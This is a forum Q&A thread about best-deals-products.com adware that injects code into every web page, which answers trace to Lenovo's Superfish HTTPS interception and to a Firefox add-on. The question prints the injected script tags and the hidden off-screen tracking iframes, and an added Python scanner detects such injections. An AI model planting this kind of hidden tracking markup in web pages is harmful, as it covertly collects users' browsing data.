What is Best-Deals-Products and is it malware?

6

2

I have found something that I suspect to be malware/adware. A script is added to every website I visit, even one I made myself. This is added in the <head>: http://puu.sh/dgIF0/0c452eb390.png and iframes are created in the body (http://puu.sh/dgJf3/c700693208.png). I checked some of it, followed the links and noticed that it collects metadata and uploads it to the internet (a piece of the code: http://puu.sh/dgIJE/3c53d5b1cc.png; with this code there was also an error). I can't find a lot of (useful) information about Best-Deal-Products on the internet (hence this message). Also, when I use Internet Explorer or Google Chrome Portable (instead of the "normal" Google Chrome) it is there again. Programs such as JunkwareRemovalTool didn't solve the problem (if it actually is a problem).

About my system: I use avast! (free), I have a Windows 8 64-bit OS, and there is Lenovo stuff. The problem does not occur when opening HTML files from my computer, only HTML files from the internet. Also it appears that it doesn't matter what network I use.

I made a blank PHP file and uploaded it to 000webhost. When looking at the source code there is only this in the head: <script src="https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc"></script> but when using "inspect element" a lot of code that is not mine is shown (besides the 000webhost code); the elements are in the attachment. The following is also in the attachment: the URLs from Best-Deal-Products found within the tags and a console log from Google Chrome when visiting google.nl.

My main questions are: What is Best-Deal-Products? What does it do? Has it any kind of negative effect for me? If yes, what can I do about it? I hope I gave enough information, but in case not, ask and I will try to find it (or a TeamViewer session?). I also requested help from avast! and VirusTotal.

Attachment:

links in the <head> tag:

https://www.best-deals-products.com/ws/sf_preloader.jsp?dlsource=hdrykzc&ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/sf_code.jsp?dlsource=hdrykzc&ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/slideup2/main.js?ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/side_slider/main.js?ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/js/base_single_icon.js?ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/css/main.css?v=2014.12.4.3.1

links in the <body> tag:

https://www.best-deals-products.com/ws/userData.jsp?dlsource=hdrykzc&userid=&ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/co/register_server_layer.html?version=2014.12.4.3.1

log from Google Chrome when visiting google.nl:

    Resource interpreted as Script but transferred with MIME type text/html: "https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc".
    sf_main.jsp?dlsource=hdrykzc:322 Uncaught TypeError: Cannot read property 'appendChild' of null
    (index):4 Resource interpreted as Script but transferred with MIME type text/html: "https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc".
    Resource interpreted as Image but transferred with MIME type text/javascript: "https://www.best-deals-products.com/ws/tu.action?userId=fa8fa52b-c827-d5d4-…d8615-d4a&referrer=&page_url=https%3A%2F%2Fwww.google.nl%2F%3Fgws_rd%3Dssl".
    frame?sourceid=1&hl=nl&origin=https%3A%2F%2Fwww.google.nl&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%…:1 Refused to load the script 'https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc' because it violates the following Content Security Policy directive: "script-src 'unsafe-inline' 'unsafe-eval' 'self' https://*.googleapis.com https://*.gstatic.com https://apis.google.com https://www.google-analytics.com https://www.googletagmanager.com https://*.talkgadget.google.com https://pagead2.googleadservices.com https://pagead2.googlesyndication.com https://tpc.googlesyndication.com https://s.ytimg.com https://www.youtube.com https://clients1.google.com https://www.google.com".

Elements in my "blank" php file hosted on 000webhost:

    <html><head>
    <script src="https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc"></script>
    <style type="text/css"></style>
    <script type="text/javascript" src="http://www.best-deals-products.com/ws/sf_preloader.jsp?dlsource=hdrykzc&amp;ver=2014.12.4.4.1"></script>
    <script type="text/javascript" src="http://www.best-deals-products.com/ws/sf_code.jsp?dlsource=hdrykzc&amp;ver=2014.12.4.4.1"></script>
    <script type="text/javascript" src="http://www.best-deals-products.com/ws/slideup2/main.js?ver=2014.12.4.4.1"></script>
    <script type="text/javascript" src="http://www.best-deals-products.com/ws/side_slider/main.js?ver=2014.12.4.4.1"></script>
    <script type="text/javascript" src="http://www.best-deals-products.com/ws/js/base_single_icon.js?ver=2014.12.4.4.1"></script>
    <link rel="stylesheet" href="http://www.best-deals-products.com/ws/css/main.css?v=2014.12.4.4.1">
    </head>
    <body>
    <div>
    </div>
    <!-- Hosting24 Analytics Code -->
    <!-- End Of Analytics Code --><script type="text/javascript" src="http://stats.hosting24.com/count.php"></script>
    <iframe src="http://www.best-deals-products.com/ws/userData.jsp?dlsource=hdrykzc&amp;userid=&amp;ver=2014.12.4.4.1" style="position: absolute; top: -100px; left: -100px; z-index: -10; border: none; visibility: hidden; width: 1px; height: 1px;"></iframe>
    <iframe src="https://www.best-deals-products.com/ws/co/register_server_layer.html?version=2014.12.4.4.1" style="position: absolute; width: 1px; height: 1px; left: -100px; top: -100px; visibility: hidden;"></iframe>
    <iframe style="position: absolute; width: 1px; height: 1px; top: 0px; left: 0px; visibility: hidden;"></iframe>
    <sfmsg id="sfMsgId" data="{&quot;imageCount&quot;:0,&quot;ip&quot;:&quot;1.1.1.1&quot;}"></sfmsg>
    </body></html>

Eadorimthryth

Posted 2014-12-05T09:12:26.950

Reputation: 63
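An added detection check (not from the question or any answer) in the spirit of the OP's blank-page test: feed the DOM the browser actually rendered to a parser and flag script sources outside the page's own origin plus iframes styled to be invisible. OWN_HOST, EXPECTED_HOSTS and the sample markup are constructed for the demo; the page being tested must contain nothing of your own except what you know you wrote.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed placeholders: the host the blank test page lives on, and the one
# third-party origin the hosting provider legitimately adds (its stats counter).
OWN_HOST = "example.000webhostapp.com"
EXPECTED_HOSTS = {"stats.hosting24.com"}


class InjectionScanner(HTMLParser):
    """Flag <script src> from unexpected origins and hidden/off-screen <iframe>s."""

    def __init__(self, own_host):
        super().__init__()
        self.own_host = own_host
        self.findings = []  # list of (kind, host)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            host = urlparse(a["src"]).hostname
            if host and host != self.own_host and host not in EXPECTED_HOSTS:
                self.findings.append(("third-party script", host))
        elif tag == "iframe":
            # Injected trackers hide themselves: visibility:hidden or a 1x1 box.
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = "visibility:hidden" in style or (
                "width:1px" in style and "height:1px" in style)
            if hidden:
                host = urlparse(a.get("src") or "").hostname
                self.findings.append(("hidden iframe", host or "(no src)"))


def scan(html, own_host=OWN_HOST):
    scanner = InjectionScanner(own_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample, trimmed from the DOM dump shown in the question.
SAMPLE_HTML = """<html><head>
<script src="https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc"></script>
<script src="http://www.best-deals-products.com/ws/sf_preloader.jsp?dlsource=hdrykzc&amp;ver=2014.12.4.4.1"></script>
</head><body>
<script src="http://stats.hosting24.com/count.php"></script>
<iframe src="http://www.best-deals-products.com/ws/userData.jsp?dlsource=hdrykzc" style="position: absolute; top: -100px; left: -100px; visibility: hidden; width: 1px; height: 1px;"></iframe>
<iframe style="position: absolute; width: 1px; height: 1px; top: 0px; left: 0px; visibility: hidden;"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, host in scan(SAMPLE_HTML):
        print(f"{kind:20} {host}")
```

Anything this flags on a page you know to be empty was added between your server and your browser (by a proxy, a certificate-interposing agent on the host, or a browser add-on), which is exactly the question to settle before hunting for the component responsible.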

Go to Chrome Settings, click on Extensions and see if there is any unknown extension running; if yes, then simply remove those extensions. – Ali786 – 2014-12-05T09:17:57.673

@ali786 This is bad advice. Google "best-deals-products remove" and you'll see this is serious adware that needs thorough cleaning to get rid of. – LPChip – 2014-12-05T10:35:11.723

Take a look at this answer to the question "How can I remove malicious spyware, malware, viruses or rootkits from my PC?". – CharlieRB – 2014-12-05T12:35:26.573

@ali786 I don't have any extensions installed. – Eadorimthryth – 2014-12-05T13:51:25.110

@LPChip I don't get any pop-ups or ads, and I didn't notice anything off with Chrome; the Google results that I get all concern pop-ups, ads and divs from best-deals-products and not what it does with me (sending metadata). – Eadorimthryth – 2014-12-05T13:53:31.760

@CharlieRB I tried it (putting everything new on my laptop; it's only two weeks old). I went to MediaMarkt to get a new clean version of Windows 8.1, put the disk in and ran it. Rebooted the computer, re-installed only that which I knew wouldn't contain the malware (official stuff like Steam, Office, Brackets, Origin) and only from official links. It didn't work, so I checked the home network again (but since other computers don't have this I eliminated this possibility). I also checked and spoke with the people from school about the school network; no problem (though many others). – Eadorimthryth – 2014-12-05T14:05:40.897

Sounds like it may be "bloat-ware" from the manufacturer. :-( – CharlieRB – 2014-12-05T17:56:23.300

@CharlieRB But wouldn't I have found more information about best-deals if it were? But if it is bloatware it is harmless, right? – Eadorimthryth – 2014-12-06T14:13:41.577

A sort of a solution: add the URL from best-deals-products to the adware filter. It doesn't remove the source of the problem, but it does remove its effects. – Eadorimthryth – 2015-01-13T21:08:37.967

This is not harmless. See these instructions for how to remove the attacker's man-in-the-middle certificate from your system. – Yakk – 2015-02-19T14:01:38.010

Answers

6

It has been revealed that many Lenovo computers are shipped with software called "Superfish" which performs a man-in-the-middle attack on all HTTP, and even secure HTTPS, requests using a self-signed SSL certificate. Among other things, Superfish injects JavaScript from best-deals-products.com into every loaded web page.

Furthermore, thanks to the ignorance of the company behind it, the private key included has already been extracted, ready to be used in public to intercept any HTTPS traffic coming from a Lenovo computer.

That means, even for banking or transactions, any attacker can read the supposedly secure content by sniffing your Wi-Fi signal. This is a very hazardous situation.

There was a case where, by using a web-based IDE like JS Bin to write code, downloading the file and uploading it to the hosting server, the script was spread to other people, even those who were not using a Lenovo computer.

You can check out the full details including if you're vulnerable here. You might also want to look at Lenovo's official statement regarding Superfish, their security advisory regarding the vulnerability, and their suggested removal instructions.

kiding

Posted 2014-12-05T09:12:26.950

Reputation: 176

Thanks for the links. However, it should be noted that there was still an issue even after removing the Superfish program. I haven't tried anything for a while now (adding the URLs to Adblock worked well), but it seems that the malware has been removed by Windows, Lenovo or another party. – Eadorimthryth – 2015-02-25T12:41:41.460

3

What is Best-Deal-Products? What does it do?

When you go online shopping it displays ads of similar products with their listed prices from elsewhere around the web. I think the intent is to help you find cheaper prices for things. It's also very possible that it does other things secretly.

Has it any kind of negative effect for me?

More ads is a negative for me. Also I don't trust it not to be doing something evil behind my back.

If yes, what can I do about it?

This will probably differ from case to case. In my case it came with my computer. It went away after uninstalling "Lenovo Experience Improvement", though I made a few other changes as well. It may have been related to Pokki, or possibly something else.

Alan Trick

Posted 2014-12-05T09:12:26.950

Reputation: 31

It isn't the "Lenovo Experience Improvement" or Pokki. I got help from Avast!, but they couldn't find it either. Thanks for the help anyway. – Eadorimthryth – 2015-01-13T21:05:02.157

0

It's not just Lenovo; some browser add-ons include JavaScript from Superfish. One that I can think of is Youtube Downloader 4K - Video Downloader (https://addons.mozilla.org/en-US/firefox/addon/media-downloader/); it has almost 160 000 users. You can open its xpi and see a file called superfish.js; by examining its content you can see where best-deals-products.com came from. If you have that add-on, remove it; there are better and clean alternatives. There are other freeware add-ons that do the same, so be careful what you install.

guest

Posted 2014-12-05T09:12:26.950

Reputation: 1

-1

Fixed.

I don't have a Lenovo PC and the Superfish malware was not installed. In my case the problem lay with a Firefox add-on called Youtube Downloader 4K - Video Downloader (or something similar); I found out by using RequestPolicy. On almost every site I visit bestdealsproduct.com wanted to inject code. The helpful answer about removing the following add-on helped: Youtube Downloader 4K - Video Downloader. Remove the add-on and you're fine.

Optimus

Posted 2014-12-05T09:12:26.950

Reputation: 1

This is pretty much a repeat of the answer by "guest" and doesn't add anything else of value. – Jamal – 2015-08-17T00:29:01.367